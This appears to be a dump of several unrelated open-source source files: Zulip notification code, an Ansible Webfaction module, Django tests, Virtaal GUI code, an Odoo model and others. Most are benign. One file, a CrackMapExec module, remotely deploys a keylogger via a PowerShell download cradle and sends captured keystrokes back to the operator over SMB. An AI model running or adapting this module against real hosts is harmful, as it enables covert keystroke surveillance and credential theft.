message_ids_to_notify.append(notify_info)
for notify_info in message_ids_to_notify:
msg_id = notify_info['message_id']
notice = build_offline_notification(user_profile_id, msg_id)
if notify_info.get('send_push', False):
queue_json_publish("missedmessage_mobile_notifications", notice, lambda notice: None)
if notify_info.get('send_email', False):
queue_json_publish("missedmessage_emails", notice, lambda notice: None)
@cache_with_key(message_cache_key, timeout=3600*24)
def get_message_by_id_dbwarn(message_id):
if not settings.TEST_SUITE:
logging.warning("Tornado failed to load message from memcached when delivering!")
return Message.objects.select_related().get(id=message_id)
def receiver_is_idle(user_profile_id, realm_presences):
# If a user has no message-receiving event queues, they've got no open zulip
# session so we notify them
all_client_descriptors = get_client_descriptors_for_user(user_profile_id)
message_event_queues = [client for client in all_client_descriptors if client.accepts_messages()]
off_zulip = len(message_event_queues) == 0
# It's possible a recipient is not in the realm of a sender. We don't have
# presence information in this case (and it's hard to get without an additional
# db query) so we simply don't try to guess if this cross-realm recipient
# has been idle for too long
if realm_presences is None or not user_profile_id in realm_presences:
return off_zulip
# We want to find the newest "active" presence entity and compare that to the
# activity expiry threshold.
user_presence = realm_presences[user_profile_id]
latest_active_timestamp = None
idle = False
for client, status in user_presence.iteritems():
if (latest_active_timestamp is None or status['timestamp'] > latest_active_timestamp) and \
status['status'] == 'active':
latest_active_timestamp = status['timestamp']
if latest_active_timestamp is None:
idle = True
else:
active_datetime = timestamp_to_datetime(latest_active_timestamp)
# 140 seconds is consistent with activity.js:OFFLINE_THRESHOLD_SECS
idle = now() - active_datetime > datetime.timedelta(seconds=140)
return off_zulip or idle
def process_message_event(event_template, users):
realm_presences = {int(k): v for k, v in event_template['presences'].items()}
sender_queue_id = event_template.get('sender_queue_id', None)
if "message_dict_markdown" in event_template:
message_dict_markdown = event_template['message_dict_markdown']
message_dict_no_markdown = event_template['message_dict_no_markdown']
else:
# We can delete this and get_message_by_id_dbwarn after the
# next prod deploy
message = get_message_by_id_dbwarn(event_template['message'])
message_dict_markdown = message.to_dict(True)
message_dict_no_markdown = message.to_dict(False)
sender_id = message_dict_markdown['sender_id']
message_id = message_dict_markdown['id']
message_type = message_dict_markdown['type']
sending_client = message_dict_markdown['client']
# To remove duplicate clients: Maps queue ID to {'client': Client, 'flags': flags}
send_to_clients = dict()
# Extra user-specific data to include
extra_user_data = {}
if 'stream_name' in event_template and not event_template.get("invite_only"):
for client in get_client_descriptors_for_realm_all_streams(event_template['realm_id']):
send_to_clients[client.event_queue.id] = {'client': client, 'flags': None}
if sender_queue_id is not None and client.event_queue.id == sender_queue_id:
send_to_clients[client.event_queue.id]['is_sender'] = True
for user_data in users:
user_profile_id = user_data['id']
flags = user_data.get('flags', [])
for client in get_client_descriptors_for_user(user_profile_id):
send_to_clients[client.event_queue.id] = {'client': client, 'flags': flags}
if sender_queue_id is not None and client.event_queue.id == sender_queue_id:
send_to_clients[client.event_queue.id]['is_sender'] = True
# If the recipient was offline and the message was a one-on-one or group
# PM to them, or they were @-mentioned, potentially notify them more
# immediately
received_pm = message_type == "private" and user_profile_id != sender_id
mentioned = 'mentioned' in flags
idle = receiver_is_idle(user_profile_id, realm_presences)
always_push_notify = user_data.get('always_push_notify', False)
if (received_pm or mentioned) and (idle or always_push_notify):
notice = build_offline_notification(user_profile_id, message_id)
queue_json_publish("missedmessage_mobile_notifications", notice, lambda notice: None)
notified = dict(push_notified=True)
# Don't send missed message emails if always_push_notify is True
if idle:
# We require RabbitMQ to do this, as we can't call the email handler
# from the Tornado process. So if there's no rabbitmq support do nothing
queue_json_publish("missedmessage_emails", notice, lambda notice: None)
notified['email_notified'] = True
extra_user_data[user_profile_id] = notified
for client_data in send_to_clients.itervalues():
client = client_data['client']
flags = client_data['flags']
is_sender = client_data.get('is_sender', False)
extra_data = extra_user_data.get(client.user_profile_id, None)
if not client.accepts_messages():
# The actual check is the accepts_event() check below;
# this line is just an optimization to avoid copying
# message data unnecessarily
continue
if client.apply_markdown:
message_dict = message_dict_markdown
else:
message_dict = message_dict_no_markdown
# Make sure Zephyr mirroring bots know whether stream is invite-only
if "mirror" in client.client_type.name and event_template.get("invite_only"):
message_dict = message_dict.copy()
message_dict["invite_only_stream"] = True
user_event = dict(type='message', message=message_dict, flags=flags)
if extra_data is not None:
user_event.update(extra_data)
if is_sender:
local_message_id = event_template.get('local_id', None)
if local_message_id is not None:
user_event["local_message_id"] = local_message_id
if not client.accepts_event(user_event):
continue
# The below prevents (Zephyr) mirroring loops.
if ('mirror' in sending_client and
sending_client.lower() == client.client_type.name.lower()):
continue
client.add_event(user_event)
def process_event(event, users):
for user_profile_id in users:
for client in get_client_descriptors_for_user(user_profile_id):
if client.accepts_event(event):
client.add_event(event.copy())
def process_userdata_event(event_template, users):
for user_data in users:
user_profile_id = user_data['id']
user_event = event_template.copy() # shallow, but deep enough for our needs
for key in user_data.keys():
if key != "id":
user_event[key] = user_data[key]
for client in get_client_descriptors_for_user(user_profile_id):
if client.accepts_event(user_event):
client.add_event(user_event)
def process_notification(notice):
event = notice['event']
users = notice['users']
if event['type'] in ["update_message"]:
process_userdata_event(event, users)
elif event['type'] == "message":
process_message_event(event, users)
else:
process_event(event, users)
# Runs in the Django process to send a notification to Tornado.
#
# We use JSON rather than bare form parameters, so that we can represent
# different types and for compatibility with non-HTTP transports.
def send_notification_http(data):
if settings.TORNADO_SERVER and not settings.RUNNING_INSIDE_TORNADO:
requests.post(settings.TORNADO_SERVER + '/notify_tornado', data=dict(
data = ujson.dumps(data),
secret = settings.SHARED_SECRET))
else:
process_notification(data)
def send_notification(data):
return queue_json_publish("notify_tornado", data, send_notification_http)
def send_event(event, users):
return queue_json_publish("notify_tornado",
dict(event=event, users=users),
send_notification_http)
| apache-2.0 |
frenchfrywpepper/ansible-modules-extras | cloud/webfaction/webfaction_site.py | 62 | 6939 | #!/usr/bin/python
#
# Create Webfaction website using Ansible and the Webfaction API
#
# ------------------------------------------
#
# (c) Quentin Stafford-Fraser 2015
#
# This file is part of Ansible
#
# Ansible is free software: you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
#
# Ansible is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with Ansible. If not, see <http://www.gnu.org/licenses/>.
#
DOCUMENTATION = '''
---
module: webfaction_site
short_description: Add or remove a website on a Webfaction host
description:
- Add or remove a website on a Webfaction host. Further documentation at http://github.com/quentinsf/ansible-webfaction.
author: Quentin Stafford-Fraser (@quentinsf)
version_added: "2.0"
notes:
- Sadly, you I(do) need to know your webfaction hostname for the C(host) parameter. But at least, unlike the API, you don't need to know the IP address - you can use a DNS name.
- If a site of the same name exists in the account but on a different host, the operation will exit.
- "You can run playbooks that use this on a local machine, or on a Webfaction host, or elsewhere, since the scripts use the remote webfaction API - the location is not important. However, running them on multiple hosts I(simultaneously) is best avoided. If you don't specify I(localhost) as your host, you may want to add C(serial: 1) to the plays."
- See `the webfaction API <http://docs.webfaction.com/xmlrpc-api/>`_ for more info.
options:
name:
description:
- The name of the website
required: true
state:
description:
- Whether the website should exist
required: false
choices: ['present', 'absent']
default: "present"
host:
description:
- The webfaction host on which the site should be created.
required: true
https:
description:
- Whether or not to use HTTPS
required: false
choices:
- true
- false
default: 'false'
site_apps:
description:
- A mapping of URLs to apps
required: false
subdomains:
description:
- A list of subdomains associated with this site.
required: false
default: null
login_name:
description:
- The webfaction account to use
required: true
login_password:
description:
- The webfaction password to use
required: true
'''
EXAMPLES = '''
- name: create website
webfaction_site:
name: testsite1
state: present
host: myhost.webfaction.com
subdomains:
- 'testsite1.my_domain.org'
site_apps:
- ['testapp1', '/']
https: no
login_name: "{{webfaction_user}}"
login_password: "{{webfaction_passwd}}"
'''
import socket
import xmlrpclib
webfaction = xmlrpclib.ServerProxy('https://api.webfaction.com/')
def main():
module = AnsibleModule(
argument_spec = dict(
name = dict(required=True),
state = dict(required=False, choices=['present', 'absent'], default='present'),
# You can specify an IP address or hostname.
host = dict(required=True),
https = dict(required=False, type='bool', default=False),
subdomains = dict(required=False, type='list', default=[]),
site_apps = dict(required=False, type='list', default=[]),
login_name = dict(required=True),
login_password = dict(required=True),
),
supports_check_mode=True
)
site_name = module.params['name']
site_state = module.params['state']
site_host = module.params['host']
site_ip = socket.gethostbyname(site_host)
session_id, account = webfaction.login(
module.params['login_name'],
module.params['login_password']
)
site_list = webfaction.list_websites(session_id)
site_map = dict([(i['name'], i) for i in site_list])
existing_site = site_map.get(site_name)
result = {}
# Here's where the real stuff happens
if site_state == 'present':
# Does a site with this name already exist?
if existing_site:
# If yes, but it's on a different IP address, then fail.
# If we wanted to allow relocation, we could add a 'relocate=true' option
# which would get the existing IP address, delete the site there, and create it
# at the new address. A bit dangerous, perhaps, so for now we'll require manual
# deletion if it's on another host.
if existing_site['ip'] != site_ip:
module.fail_json(msg="Website already exists with a different IP address. Please fix by hand.")
# If it's on this host and the key parameters are the same, nothing needs to be done.
if (existing_site['https'] == module.boolean(module.params['https'])) and \
(set(existing_site['subdomains']) == set(module.params['subdomains'])) and \
(dict(existing_site['website_apps']) == dict(module.params['site_apps'])):
module.exit_json(
changed = False
)
positional_args = [
session_id, site_name, site_ip,
module.boolean(module.params['https']),
module.params['subdomains'],
]
for a in module.params['site_apps']:
positional_args.append( (a[0], a[1]) )
if not module.check_mode:
# If this isn't a dry run, create or modify the site
result.update(
webfaction.create_website(
*positional_args
) if not existing_site else webfaction.update_website (
*positional_args
)
)
elif site_state == 'absent':
# If the site's already not there, nothing changed.
if not existing_site:
module.exit_json(
changed = False,
)
if not module.check_mode:
# If this isn't a dry run, delete the site
result.update(
webfaction.delete_website(session_id, site_name, site_ip)
)
else:
module.fail_json(msg="Unknown state specified: {}".format(site_state))
module.exit_json(
changed = True,
result = result
)
from ansible.module_utils.basic import *
main()
| gpl-3.0 |
jgao54/airflow | airflow/migrations/versions/a56c9515abdc_remove_dag_stat_table.py | 6 | 1581 | #
# Licensed to the Apache Software Foundation (ASF) under one
# or more contributor license agreements. See the NOTICE file
# distributed with this work for additional information
# regarding copyright ownership. The ASF licenses this file
# to you under the Apache License, Version 2.0 (the
# "License"); you may not use this file except in compliance
# with the License. You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing,
# software distributed under the License is distributed on an
# "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY
# KIND, either express or implied. See the License for the
# specific language governing permissions and limitations
# under the License.
"""Remove dag_stat table
Revision ID: a56c9515abdc
Revises: c8ffec048a3b
Create Date: 2018-12-27 10:27:59.715872
"""
from alembic import op
import sqlalchemy as sa
# revision identifiers, used by Alembic.
revision = 'a56c9515abdc'
down_revision = 'c8ffec048a3b'
branch_labels = None
depends_on = None
def upgrade():
op.drop_table("dag_stats")
def downgrade():
op.create_table('dag_stats',
sa.Column('dag_id', sa.String(length=250), nullable=False),
sa.Column('state', sa.String(length=50), nullable=False),
sa.Column('count', sa.Integer(), nullable=False, default=0),
sa.Column('dirty', sa.Boolean(), nullable=False, default=False),
sa.PrimaryKeyConstraint('dag_id', 'state'))
| apache-2.0 |
shintoo/DailyImage | getimage.py | 1 | 1515 | #!/usr/bin/python
# getimage.py - this file is part of dailyimage
# Retrieve an image from a google image search
import sys # argv
import re # finding images
import requests # downloading results and images
import bs4 # finding images
def get_image(query):
'''
function get_image
generator
arguments:
query: string
yields:
Raw image data retrieved from a google image search of the query
'''
# URL for the image search
url = 'https://www.google.com/search?tbm=isch&q=' + query
# Download the result
res = requests.get(url)
# Check for error code
res.raise_for_status()
# Generate the parser
Soup = bs4.BeautifulSoup(res.text, 'lxml')
# Find each image - in this case, the thumbnail of each result
images = Soup.findAll('img')
for img in images:
# Find all images with 'gstatic.com' in their src
search = re.search('gstatic.com', img['src'])
if search:
# Download the image
raw_image = requests.get(img['src'])
raw_image.raise_for_status()
# yield the raw binary data
yield raw_image.content
def main(argv):
    if len(argv) != 2:
        print('usage: getimage.py query')
        return
    images = get_image(argv[1]) # begin generator
    print('Saving ' + argv[1] + '_image...')
    fp = open(argv[1] + '_image', 'wb')
    fp.write(next(images)) # fetch the first downloaded image
    fp.close()
if __name__ == '__main__':
main(sys.argv)
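# Example invocation (a sketch; 'cats' is an arbitrary query):
#   $ python getimage.py cats
#   Saving cats_image...
# The raw thumbnail bytes end up in ./cats_image.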
| mit |
jorik041/CrackMapExec | cme/modules/get_keystrokes.py | 1 | 4591 | from cme.helpers.powershell import *
from cme.helpers.misc import gen_random_string
from cme.servers.smb import CMESMBServer
from gevent import sleep
from sys import exit
import os
class CMEModule:
'''
Executes PowerSploit's Get-Keystrokes script
Module by @byt3bl33d3r
'''
name = 'get_keystrokes'
description = "Logs keys pressed, time and the active window"
supported_protocols = ['smb', 'mssql']
opsec_safe = True
multiple_hosts = True
def options(self, context, module_options):
'''
TIMEOUT Specifies the interval in minutes to capture keystrokes.
STREAM Specifies whether to stream the keys over the network (default: False)
POLL Specifies the interval in seconds to poll the log file (default: 20)
'''
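        # Typical invocation (assumed CrackMapExec CLI syntax, shown only
        # as an illustration):
        #   cme smb <target> -M get_keystrokes -o TIMEOUT=10 STREAM=True POLL=30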
if 'TIMEOUT' not in module_options:
context.log.error('TIMEOUT option is required!')
exit(1)
self.stream = False
self.poll = 20
self.timeout = int(module_options['TIMEOUT'])
if 'STREAM' in module_options:
self.stream = bool(module_options['STREAM'])
if 'POLL' in module_options:
self.poll = int(module_options['POLL'])
context.log.info('This module will not exit until CTRL-C is pressed')
context.log.info('Keystrokes will be stored in ~/.cme/logs\n')
self.ps_script1 = obfs_ps_script('cme_powershell_scripts/Invoke-PSInject.ps1')
self.ps_script2 = obfs_ps_script('powersploit/Exfiltration/Get-Keystrokes.ps1')
if self.stream:
self.share_name = gen_random_string(5).upper()
self.smb_server = CMESMBServer(context.log, self.share_name, context.log_folder_path)
self.smb_server.start()
else:
self.file_name = gen_random_string(5)
def on_admin_login(self, context, connection):
keys_folder = 'get_keystrokes_{}'.format(connection.host)
if not self.stream:
command = 'Get-Keystrokes -LogPath "$Env:Temp\\{}" -Timeout {}'.format(self.file_name, self.timeout)
else:
command = 'Get-Keystrokes -LogPath \\\\{}\\{}\\{}\\keys.log -Timeout {}'.format(context.localip, self.share_name, keys_folder, self.timeout)
keys_command = gen_ps_iex_cradle(context, 'Get-Keystrokes.ps1', command, post_back=False)
launcher = gen_ps_inject(keys_command, context)
connection.ps_execute(launcher)
context.log.success('Executed launcher')
if not self.stream:
users = connection.loggedon_users()
keys_folder_path = os.path.join(context.log_folder_path, keys_folder)
try:
while True:
for user in users:
if '$' not in user.wkui1_username and os.path.exists(keys_folder_path):
keys_log = os.path.join(keys_folder_path, 'keys_{}.log'.format(user.wkui1_username))
with open(keys_log, 'a+') as key_file:
file_path = '/Users/{}/AppData/Local/Temp/{}'.format(user.wkui1_username, self.file_name)
try:
connection.conn.getFile('C$', file_path, key_file.write)
context.log.success('Got keys! Stored in {}'.format(keys_log))
except Exception as e:
context.log.debug('Error retrieving key file contents from {}: {}'.format(file_path, e))
sleep(self.poll)
except KeyboardInterrupt:
pass
def on_request(self, context, request):
if 'Invoke-PSInject.ps1' == request.path[1:]:
request.send_response(200)
request.end_headers()
request.wfile.write(self.ps_script1)
elif 'Get-Keystrokes.ps1' == request.path[1:]:
request.send_response(200)
request.end_headers()
# We received the callback, so lets setup the folder to store the keys
keys_folder_path = os.path.join(context.log_folder_path, 'get_keystrokes_{}'.format(request.client_address[0]))
if not os.path.exists(keys_folder_path): os.mkdir(keys_folder_path)
request.wfile.write(self.ps_script2)
request.stop_tracking_host()
else:
request.send_response(404)
request.end_headers()
def on_shutdown(self, context, connection):
if self.stream:
self.smb_server.shutdown()
| bsd-2-clause |
foursquare/commons-old | src/python/twitter/common/log/formatters/plain.py | 16 | 1610 | # ==================================================================================================
# Copyright 2011 Twitter, Inc.
# --------------------------------------------------------------------------------------------------
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this work except in compliance with the License.
# You may obtain a copy of the License in the LICENSE file, or at:
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ==================================================================================================
import logging
from twitter.common.log.formatters.base import format_message
class PlainFormatter(logging.Formatter):
"""
Format a log in a plainer style:
type] msg
"""
SCHEME = 'plain'
LEVEL_MAP = {
logging.FATAL: 'FATAL',
logging.ERROR: 'ERROR',
logging.WARN: ' WARN',
logging.INFO: ' INFO',
logging.DEBUG: 'DEBUG'
}
def __init__(self):
logging.Formatter.__init__(self)
def format(self, record):
try:
level = PlainFormatter.LEVEL_MAP[record.levelno]
except:
level = '?????'
record_message = '%s] %s' % (level, format_message(record))
record.getMessage = lambda: record_message
return logging.Formatter.format(self, record)
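# A minimal wiring sketch (the handler choice is an assumption, not part
# of this module):
#
#   import logging
#   handler = logging.StreamHandler()
#   handler.setFormatter(PlainFormatter())
#   logging.getLogger().addHandler(handler)
#   logging.getLogger().warning('disk almost full')  # -> " WARN] disk almost full"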
| apache-2.0 |
scootergrisen/virtaal | virtaal/views/langview.py | 6 | 8842 | #!/usr/bin/env python
# -*- coding: utf-8 -*-
#
# Copyright 2009-2011 Zuza Software Foundation
#
# This file is part of Virtaal.
#
# This program is free software; you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation; either version 2 of the License, or
# (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with this program; if not, see <http://www.gnu.org/licenses/>.
import os
import gobject
import gtk
import gtk.gdk
import logging
from virtaal.common import GObjectWrapper
from virtaal.models.langmodel import LanguageModel
from baseview import BaseView
from widgets.popupmenubutton import PopupMenuButton
class LanguageView(BaseView):
"""
Manages the language selection on the GUI and communicates with its associated
C{LanguageController}.
"""
# INITIALIZERS #
def __init__(self, controller):
self.controller = controller
self._init_gui()
def _create_dialogs(self):
from widgets.langselectdialog import LanguageSelectDialog
from widgets.langadddialog import LanguageAddDialog
langs = [LanguageModel(lc) for lc in LanguageModel.languages]
langs.sort(key=lambda x: x.name)
self.select_dialog = LanguageSelectDialog(langs, parent=self.controller.main_controller.view.main_window)
self.select_dialog.btn_add.connect('clicked', self._on_addlang_clicked)
self.add_dialog = LanguageAddDialog(parent=self.select_dialog.dialog)
def _init_gui(self):
self.menu = None
self.popupbutton = PopupMenuButton()
self.popupbutton.connect('toggled', self._on_button_toggled)
self.controller.main_controller.view.main_window.connect(
'style-set', self._on_style_set
)
if self.controller.recent_pairs:
self.popupbutton.text = self._get_display_string(*self.controller.recent_pairs[0])
def _init_menu(self):
self.menu = gtk.Menu()
self.popupbutton.set_menu(self.menu)
self.recent_items = []
for i in range(self.controller.NUM_RECENT):
item = gtk.MenuItem('')
item.connect('activate', self._on_pairitem_activated, i)
self.recent_items.append(item)
seperator = gtk.SeparatorMenuItem()
self.other_item = gtk.MenuItem(_('_New Language Pair...'))
self.other_item.connect('activate', self._on_other_activated)
[self.menu.append(item) for item in (seperator, self.other_item)]
self.update_recent_pairs()
self.controller.main_controller.view.main_window.connect(
'style-set', self._on_style_set
)
# METHODS #
def _get_display_string(self, srclang, tgtlang):
if self.popupbutton.get_direction() == gtk.TEXT_DIR_RTL:
# We need to make sure we get the direction correct if the
# language names are untranslated. The right-to-left embedding
# (RLE) characters ensure that untranslated language names will
            # still display with the correct direction as they are present
# in the interface.
            pairlabel = u'\u202b%s → \u202b%s' % (srclang.name, tgtlang.name)
        else:
            pairlabel = u'%s → %s' % (srclang.name, tgtlang.name)
# While it seems that the arrows are not well supported on Windows
# systems, we fall back to using the French quotes. It automatically
# does the right thing for RTL.
if os.name == 'nt':
            pairlabel = u'%s » %s' % (srclang.name, tgtlang.name)
return pairlabel
def notify_same_langs(self):
def notify():
for s in [gtk.STATE_ACTIVE, gtk.STATE_NORMAL, gtk.STATE_PRELIGHT, gtk.STATE_SELECTED]:
self.popupbutton.child.modify_fg(s, gtk.gdk.color_parse('#f66'))
gobject.idle_add(notify)
def notify_diff_langs(self):
def notify():
if hasattr(self, 'popup_default_fg'):
fgcol = self.popup_default_fg
else:
fgcol = gtk.widget_get_default_style().fg
for s in [gtk.STATE_ACTIVE, gtk.STATE_NORMAL, gtk.STATE_PRELIGHT, gtk.STATE_SELECTED]:
self.popupbutton.child.modify_fg(s, fgcol[s])
gobject.idle_add(notify)
def show(self):
"""Add the managed C{PopupMenuButton} to the C{MainView}'s status bar."""
statusbar = self.controller.main_controller.view.status_bar
for child in statusbar.get_children():
if child is self.popupbutton:
return
statusbar.pack_end(self.popupbutton, expand=False)
statusbar.show_all()
def focus(self):
self.popupbutton.grab_focus()
def update_recent_pairs(self):
if not self.menu:
self._init_menu()
# Clear all menu items
for i in range(self.controller.NUM_RECENT):
item = self.recent_items[i]
if item.parent is self.menu:
item.get_child().set_text('')
self.menu.remove(item)
# Update menu items' strings
i = 0
for pair in self.controller.recent_pairs:
if i not in range(self.controller.NUM_RECENT):
break
self.recent_items[i].get_child().set_text_with_mnemonic(
"_%(accesskey)d. %(language_pair)s" % {
"accesskey": i + 1,
"language_pair": self._get_display_string(*pair)
}
)
i += 1
# Re-add menu items that have something to show
for i in range(self.controller.NUM_RECENT):
item = self.recent_items[i]
if item.get_child().get_text():
self.menu.insert(item, i)
self.menu.show_all()
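        # get_text() yields e.g. "1. English → French" (the mnemonic
        # underscore is consumed), so the [3:] below strips the "1. " prefix.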
self.popupbutton.text = self.recent_items[0].get_child().get_text()[3:]
# EVENT HANDLERS #
def _on_addlang_clicked(self, button):
if not self.add_dialog.run():
return
err = self.add_dialog.check_input_sanity()
if err:
self.controller.main_controller.show_error(err)
return
name = self.add_dialog.langname
code = self.add_dialog.langcode
nplurals = self.add_dialog.nplurals
plural = self.add_dialog.plural
if self.add_dialog.langcode in LanguageModel.languages:
raise Exception('Language code %s already used.' % (code))
LanguageModel.languages[code] = (name, nplurals, plural)
self.controller.new_langs.append(code)
# Reload the language data in the selection dialog.
self.select_dialog.clear_langs()
langs = [LanguageModel(lc) for lc in LanguageModel.languages]
langs.sort(key=lambda x: x.name)
self.select_dialog.update_languages(langs)
def _on_button_toggled(self, popupbutton):
if not popupbutton.get_active():
return
detected = self.controller.get_detected_langs()
if detected and len(detected) == 2 and detected[0] and detected[1]:
logging.debug("Detected language pair: %s -> %s" % (detected[0].code, detected[1].code))
if detected not in self.controller.recent_pairs:
if len(self.controller.recent_pairs) >= self.controller.NUM_RECENT:
self.controller.recent_pairs[-1] = detected
else:
self.controller.recent_pairs.append(detected)
self.update_recent_pairs()
def _on_other_activated(self, menuitem):
if not getattr(self, 'select_dialog', None):
self._create_dialogs()
if self.select_dialog.run(self.controller.source_lang.code, self.controller.target_lang.code):
self.controller.set_language_pair(
self.select_dialog.get_selected_source_lang(),
self.select_dialog.get_selected_target_lang()
)
self.controller.main_controller.unit_controller.view.targets[0].grab_focus()
def _on_pairitem_activated(self, menuitem, item_n):
logging.debug('Selected language pair: %s' % (self.recent_items[item_n].get_child().get_text()))
pair = self.controller.recent_pairs[item_n]
self.controller.set_language_pair(*pair)
self.controller.main_controller.unit_controller.view.targets[0].grab_focus()
def _on_style_set(self, widget, prev_style):
if not hasattr(self, 'popup_default_fg'):
self.popup_default_fg = widget.style.fg
| gpl-2.0 |
mshafiq9/django | tests/template_tests/filter_tests/test_truncatewords.py | 215 | 1705 | from django.template.defaultfilters import truncatewords
from django.test import SimpleTestCase
from django.utils.safestring import mark_safe
from ..utils import setup
class TruncatewordsTests(SimpleTestCase):
@setup({'truncatewords01':
'{% autoescape off %}{{ a|truncatewords:"2" }} {{ b|truncatewords:"2"}}{% endautoescape %}'})
def test_truncatewords01(self):
output = self.engine.render_to_string('truncatewords01', {'a': 'alpha & bravo', 'b': mark_safe('alpha & bravo')})
self.assertEqual(output, 'alpha & ... alpha & ...')
@setup({'truncatewords02': '{{ a|truncatewords:"2" }} {{ b|truncatewords:"2"}}'})
def test_truncatewords02(self):
output = self.engine.render_to_string('truncatewords02', {'a': 'alpha & bravo', 'b': mark_safe('alpha & bravo')})
self.assertEqual(output, 'alpha & ... alpha & ...')
class FunctionTests(SimpleTestCase):
def test_truncate(self):
self.assertEqual(truncatewords('A sentence with a few words in it', 1), 'A ...')
def test_truncate2(self):
self.assertEqual(
truncatewords('A sentence with a few words in it', 5),
'A sentence with a few ...',
)
def test_overtruncate(self):
self.assertEqual(
truncatewords('A sentence with a few words in it', 100),
'A sentence with a few words in it',
)
def test_invalid_number(self):
self.assertEqual(
truncatewords('A sentence with a few words in it', 'not a number'),
'A sentence with a few words in it',
)
def test_non_string_input(self):
self.assertEqual(truncatewords(123, 2), '123')
| bsd-3-clause |
simongoffin/my_odoo_tutorial | addons/analytic/analytic.py | 12 | 17961 | # -*- coding: utf-8 -*-
##############################################################################
#
# OpenERP, Open Source Management Solution
# Copyright (C) 2004-2010 Tiny SPRL (<http://tiny.be>).
#
# This program is free software: you can redistribute it and/or modify
# it under the terms of the GNU Affero General Public License as
# published by the Free Software Foundation, either version 3 of the
# License, or (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU Affero General Public License for more details.
#
# You should have received a copy of the GNU Affero General Public License
# along with this program. If not, see <http://www.gnu.org/licenses/>.
#
##############################################################################
import time
from datetime import datetime
from openerp.osv import fields, osv
from openerp import tools
from openerp.tools.translate import _
import openerp.addons.decimal_precision as dp
class account_analytic_account(osv.osv):
_name = 'account.analytic.account'
_inherit = ['mail.thread']
_description = 'Analytic Account'
_track = {
'state': {
'analytic.mt_account_pending': lambda self, cr, uid, obj, ctx=None: obj.state == 'pending',
'analytic.mt_account_closed': lambda self, cr, uid, obj, ctx=None: obj.state == 'close',
'analytic.mt_account_opened': lambda self, cr, uid, obj, ctx=None: obj.state == 'open',
},
}
def _compute_level_tree(self, cr, uid, ids, child_ids, res, field_names, context=None):
currency_obj = self.pool.get('res.currency')
recres = {}
def recursive_computation(account):
result2 = res[account.id].copy()
for son in account.child_ids:
result = recursive_computation(son)
for field in field_names:
if (account.currency_id.id != son.currency_id.id) and (field!='quantity'):
result[field] = currency_obj.compute(cr, uid, son.currency_id.id, account.currency_id.id, result[field], context=context)
result2[field] += result[field]
return result2
for account in self.browse(cr, uid, ids, context=context):
if account.id not in child_ids:
continue
recres[account.id] = recursive_computation(account)
return recres
def _debit_credit_bal_qtty(self, cr, uid, ids, fields, arg, context=None):
res = {}
if context is None:
context = {}
child_ids = tuple(self.search(cr, uid, [('parent_id', 'child_of', ids)]))
for i in child_ids:
res[i] = {}
for n in fields:
res[i][n] = 0.0
if not child_ids:
return res
where_date = ''
where_clause_args = [tuple(child_ids)]
if context.get('from_date', False):
where_date += " AND l.date >= %s"
where_clause_args += [context['from_date']]
if context.get('to_date', False):
where_date += " AND l.date <= %s"
where_clause_args += [context['to_date']]
cr.execute("""
SELECT a.id,
sum(
CASE WHEN l.amount > 0
THEN l.amount
ELSE 0.0
END
) as debit,
sum(
CASE WHEN l.amount < 0
THEN -l.amount
ELSE 0.0
END
) as credit,
COALESCE(SUM(l.amount),0) AS balance,
COALESCE(SUM(l.unit_amount),0) AS quantity
FROM account_analytic_account a
LEFT JOIN account_analytic_line l ON (a.id = l.account_id)
WHERE a.id IN %s
""" + where_date + """
GROUP BY a.id""", where_clause_args)
for row in cr.dictfetchall():
res[row['id']] = {}
for field in fields:
res[row['id']][field] = row[field]
return self._compute_level_tree(cr, uid, ids, child_ids, res, fields, context)
def name_get(self, cr, uid, ids, context=None):
res = []
if not ids:
return res
if isinstance(ids, (int, long)):
ids = [ids]
for id in ids:
elmt = self.browse(cr, uid, id, context=context)
res.append((id, self._get_one_full_name(elmt)))
return res
def _get_full_name(self, cr, uid, ids, name=None, args=None, context=None):
        if context is None:
context = {}
res = {}
for elmt in self.browse(cr, uid, ids, context=context):
res[elmt.id] = self._get_one_full_name(elmt)
return res
def _get_one_full_name(self, elmt, level=6):
if level<=0:
return '...'
if elmt.parent_id and not elmt.type == 'template':
parent_path = self._get_one_full_name(elmt.parent_id, level-1) + " / "
else:
parent_path = ''
return parent_path + elmt.name
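    # e.g. an account "C" under parents "A / B" renders as "A / B / C";
    # nesting deeper than the level limit collapses the remainder to '...'.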
def _child_compute(self, cr, uid, ids, name, arg, context=None):
result = {}
if context is None:
context = {}
for account in self.browse(cr, uid, ids, context=context):
result[account.id] = map(lambda x: x.id, [child for child in account.child_ids if child.state != 'template'])
return result
def _get_analytic_account(self, cr, uid, ids, context=None):
company_obj = self.pool.get('res.company')
analytic_obj = self.pool.get('account.analytic.account')
accounts = []
for company in company_obj.browse(cr, uid, ids, context=context):
accounts += analytic_obj.search(cr, uid, [('company_id', '=', company.id)])
return accounts
def _set_company_currency(self, cr, uid, ids, name, value, arg, context=None):
if isinstance(ids, (int, long)):
ids=[ids]
for account in self.browse(cr, uid, ids, context=context):
if account.company_id:
if account.company_id.currency_id.id != value:
raise osv.except_osv(_('Error!'), _("If you set a company, the currency selected has to be the same as it's currency. \nYou can remove the company belonging, and thus change the currency, only on analytic account of type 'view'. This can be really useful for consolidation purposes of several companies charts with different currencies, for example."))
if value:
